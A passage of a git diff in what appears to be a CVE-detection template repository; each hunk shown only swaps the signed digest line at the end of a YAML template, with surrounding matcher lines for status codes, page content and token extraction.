4b0a0048304602210097665e0767c934a666cf05e3627f2b6d8dd5884c8d1357133b6c1a3af43b2d7a022100cc472353a177d1e473f1016d6ec099a23dff7144e78b65aba6b2013f40bdc009:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index 58952063d7..c5e80e79f7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039fe11caf5250995e163d4a766f610d944380417a5b15906a9ef6a50792288bc02210093ff5a9b48efb195c8f6dfbc8f5cd26393edf6f89159808dce94156e8fe2c052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 9a9c3581ae..d6d35eb203 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 404 -# digest: 4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d31eac3d15d81134911f90f3c97df9b33a3f368a6e719f11104eb87b6b014a64022100b087422d6f0c4d4b4ac90c6da503f8cde1a878308d465636399a9a8770b32912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index b6b020f53c..d3e44e6d09 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002211a03096dd54eb8c3d75c4c6b2ec6e688174a032a7e6c2aa6abf607de4458022100cb1bece977e680447b79ab7a7829bea6009908a87348e63ddeba2341904d33fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 757812e06d..674ba7414d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220010262b4de9c6ff3122acc32c8ece3f4732b2d28ed1e6d3048a1524b26505297022100f98b46a4ccfddc90026ae807b177eece99376bfde1ec4ef6b03c52ec88157a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 2928cc45f8..d6ad8ae12e 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and -# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063e17e9119db0e711c2185a23a857e3c34a07b1c70353f799246c634d4e373b502210098e4d61d55e9bf0a4baa6ef83c2d08c7c8e434dbcbfbd7a125170ccb3658d056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 85067c7dfd..597ad2ddb7 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8d42704600cbd3b6ff54126c94d34ed31967c6de8e2a12c926fbb45a236956902205488ccf7f3b181305fec30b4573024752ec9767624d685bc0b5391b87453f1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index a7e4f8bb52..9775a520b9 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4ae4211819c3a0102f74e2f01245fa1f03ed7819b74592072bfe869bddf2853022100bd69a98016f2f0a1f19b4db4f757a6dd1986e530b5b323f0450d9bbc9f9528c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 92b353c8fa..a1092ce628 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022056ef355da515fd5fec4be2362351876869abc614ca07d9fce9a039bee8eccc02022100e3e2aa9accb169e9c661823b305d23dd0d1556dbfadb8071fecce855502ee56b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index b54cfe9af1..792970c05a 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a93db41929ce060ff64fee5328f57e9aab33ae2d90304cfd9045ff515b71bd1c022060dcf99e3c0172ccfcd1f7d068dfe41d2b7eb794183cacb03efab0efefc6f339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index a17b4eb1c0..d1a00915ab 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ab01aaa506a6ebbad0beb8069bc5370186ee053320cfa747184e193f37d774a022100b0046b6845259abb54266ef0299e04aaf6dc2cdff6f3d9c86c29cd20b534bc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 7a380b5adf..54123c2046 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -47,4 +47,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204036ea21962a8358bf28cfe4e30afd87bee2fbd81960480db8568c56da29777902207c2d8fa3bae877879ef164102d75f536f8c843c4e1d443c9bc9c73c33417d370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index cd761c6f9f..0d0ddd2969 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f5d1ea712656f85c01c259e31b70596810c89dcc922913583b8eaac709a470002205131821d069a47e71f515eb822596009a6662151409dfe920616f1c833a70efc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 00c47dfce3..e02cf51aae 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e808a43a439e765a63d1b5cad4a5beeaa462bb15bcd0d6b064822dd624152fad022032ef9ca1827b9acfd5826cef54120a9a5117625af4e9f1378a351b26444de0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index c80e682bb4..0260380daf 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040585671c609fe334367822249136fb6366ff15bb77949df51bd3507925f2761022100b01f4c652002b57730f4b33c3d84cb008efda5f95ba10bcb36d58277216be1c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 1298ccca67..d2b145f378 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd6591bc51f266f675743710abbcf5977d606dfff7c166754ce2e90e33d44312022019bc20df736191c6fd9db84bd4090aa89c6b46edc6b63f51d171eebfa307b3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 6380bf2f13..ef33f372c0 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fbf5c0f8673a21f5b852a6d4ad1a70d44c24f166a11c1d30c7e5f19d78933d3022100d8a0f653d81329054a3902f01425e0b86f10f76908ad1127b2b4054db7de4c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index e6e9cba7f6..13c47d1c7f 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a9f70675d0f9bbc565259bec1b966bb4bc99bc470cf99302ee287e5dc66c76102201dc4505f6d046ffad4cac841b64bb7ca57c420eab6045422bb18804578d1219a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index c9fc1fb9ef..10dee154bf 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220777f68c6c7edb9b9127312f9deb85b16ffe7931cf295fdf733b9f29112feceac022100f56c9fd54f660add620c43e5191517c6736e3f2190778df91cfd8576b8e43b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 076660f1da..00849a488f 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d1d3e1624f6b7d4937d108b86ac91b2bc80ae4e861df56df8d26c87a1985d5e022100e1aae9b6ef9306b43a16bf1defea1dffeda0cfcb6d286fb4a91eb74db4f94022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 359b193a5a..d44d8a29fa 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -51,4 +51,4 @@ http: part: header words: - "application/json" -# digest: 4a0a00473045022100b6741a571d75e359c60ca79e0081337777b9697c68b0739b50509dc80d199bb3022051e8b48b4f9a5f97c6c7c753a04b14967c4a085998f070e01e462a0e8e0a6561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9d63bc45aaf82137f887487f967ad8d4a41d3f913dfc5b4d4d7d4c5587ca0c2022100f949ff4cefbc5e5c63a8c50244c0e269764063a363693d776245a8dc60f86bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 4f0e01014a..9900d63e5b 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085b42f8dbd813c96278a0624ae4a965cdc783df9e3aa63049b454bd2ae602013022029dbcaa2e3817680a0953759908166cd302d0bd893beb86fc9f17de74ff7b75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 765fc77d75..00b709a0ca 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{{md5(num)}}")' condition: and -# digest: 4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021766a949cd8ce92eba5417c3955b72e5125cbeb4e851636eb75685f6d0fb24c022100c54171ad7da1e1f3267551cb193282182c18b7e80504d734197d6dd16b8b5d1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 0e14af4ba6..055295ce1d 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -65,4 +65,4 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' part: interactsh_request -# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd03e342025e4e4e80c95f6b5830928e3c04fa9aaf85d57c0c25b011d377f2dc022071e70c560ca19c5672698896f856d803cc045931a344b12763e88e9576237d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 50b56671f4..dc9e2bc9d0 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ced93a185c58b88df1c70897c1f6dfbaf25212b4cf23e967daab07a3f4f8b26022100d60ce7b8a964ef513617dbe328e1d821211c417229337310c3ed6f29afc9be9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 6d3f685a3d..762fd50d19 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e4cfe6c74428a54ab533bd2a916dc9d6cf210d604b99c8966d52ce649709bf022100ae914cfbdca0edf2dc747a74933906c9fefdb395d0ca32ebffc53fb08a8afd29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index 0f7481cd1c..e1ec2a722a 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe70fa0361640569e01148b22519eb88b8958d59fa15a830cef91157f8384e7702201023fc8e27b30af579fde71a67ae5c6ecca49e54286a3405e7b86c949c9c3b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 87985331b8..40741fd8ef 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -68,4 +68,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6f322953dacdad93f04bc1381201d8bfdeb9c2d04cd3c3546f389ce84505c702204b9d95f0912ea15c7f120e0858c15494e70113915191df198bf56fc3d167bb8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index ef529d9285..4066ab57c2 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -136,4 +136,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7d4964d1905789736e3a4f7d81c97da2e2fcb7587fbc44b9b77b31565f024f802210095e49a98d6ecd2b58fb7b31f6080ec748944219252388c4f71d1cb79cb4a5d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 191c90351e..f4a4f29b6e 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -136,4 +136,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ac0fdf892a88e6623b9ea9eb161e13825b21005149165a114a80210ac403468022100be64ce591a07ff770d1fb4b7f5c8eba983dafc66047ab3ed86438c32bf30ce53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index 6fefe8f747..660d0658d8 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d44916dd81f7ce94612f0c1e2890e7134330c3cdfde072afb0bebee2637645a60220528367fdcb13fe02279faadd362eb0997a4ba128c73c674e232b193e92f54e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index f0c9738bde..def3523eff 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -149,4 +149,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075dd10c8952c99d3765de618d4a12b1121e846f8a3f50fdb0a7d81cd182332190220675cefe52e74f4fce21384e4e29d88abbc39992e277077451f596820960ea506:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 4b9c6a44cd..b83792639c 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -168,4 +168,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b4a13ff7bbbcf2d7e1b9b282d20b180d7d41aed95b378f25b5c10ff31ec0733d022100f911e14dc71efd6ca82157416ed0b18b686711bd881b9c5b9bfe08a99b67f699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml index 462c4d2f12..07a2b5374f 100644 --- a/http/cves/2022/CVE-2022-45354.yaml +++ b/http/cves/2022/CVE-2022-45354.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3aee961f865ab0369274e259216c6aeb8c0e3e05085fcc01c6e0bdc64144aec022100c8df2a03150f4267cb69a65308a40da4bcfe440d407ddbcf758fd1f0d6360525:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45365.yaml b/http/cves/2022/CVE-2022-45365.yaml index 62f5c91dc9..e74f9d6693 100644 --- a/http/cves/2022/CVE-2022-45365.yaml +++ b/http/cves/2022/CVE-2022-45365.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046a2c0fe907c58a9b3874b212d37ff610222781cef5966b7b7b95dd4e0f16b7902210081f249fa4a02e7e56036f9e4c8e11172e9948b3236b1a137878fd87c08f037dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b013fa8cee3a52712247ffcd2dc866e9fd3ca0812ee6b12ed34bc232b93a22f50220238f3dbe08c862c1f4dd2e1dce53b879a0e957e1c0328e8f606a4d1dc5b39a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml index a473a14b69..1f6eaad2f3 100644 --- a/http/cves/2022/CVE-2022-45805.yaml +++ b/http/cves/2022/CVE-2022-45805.yaml @@ -51,4 +51,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "toplevel_page_paytm")' condition: and -# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a74234b549831b4e24377282c733bafd074ef02d19d218eff1112a48b29e2eab022100c94f1431b5c09cc148bfdd9942d6fbc7860eec0e17676e3a9ea37e310b8bd7b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index 3697e93e1b..e85e861ccb 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ 